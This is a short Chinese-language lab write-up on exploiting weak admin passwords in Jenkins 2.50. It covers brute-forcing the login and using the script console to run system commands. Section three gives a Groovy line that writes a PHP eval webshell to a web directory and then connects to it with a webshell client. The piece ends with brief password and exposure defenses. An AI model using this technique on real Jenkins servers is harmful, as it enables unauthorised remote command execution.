jenkins弱口令漏洞
一、漏洞描述
通過暴力破解管理控制台,如果爆破成功,可獲得后台管理權限。操作后台,后台可通過腳本命令行功能執行系統命令,如反彈shell等,低權限可以通過創建控制台輸出方式執行命令。
二、漏洞環境搭建
1、 官方下載jenkins-2.50-1.1.noarch.rpm,下載地址: http://mirrors.jenkins.io
2、在redhat6.5上安裝jenkins
2.1、使用rpm安裝
rpm -ivh jenkins-2.50-1.1.noarch.rpm

2.2、啟動服務

2.3、瀏覽器訪問http://192.168.10.137:8080,如下圖所示需要輸入密碼,密碼文件在如下圖位置

2.4查看密碼文件,輸入密碼后進入如下界面,選擇安裝建議的插件

2.5、安裝完插件之后,進入如下界面,設置用戶名和密碼

2.6、設置完用戶和密碼之后,進入如下界面,點擊如下圖位置,到此為止,jenkins環境搭建成功


三、漏洞復現
1、瀏覽器訪問http://192.168.10.137:8080

2、猜解出密碼,然后登錄,點擊”系統管理”

3、選擇如下圖所示

4、利用”腳本命令行”上傳webshell,內容如下:
new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');

5、點擊“運行”,沒有報錯,上傳成功
6、菜刀連接

四、漏洞防御
1、增強后台密碼強度
2、后台不對外開放
-------------------------------------------------------------------------------
參考鏈接:https://www.secpulse.com/archives/2166.html
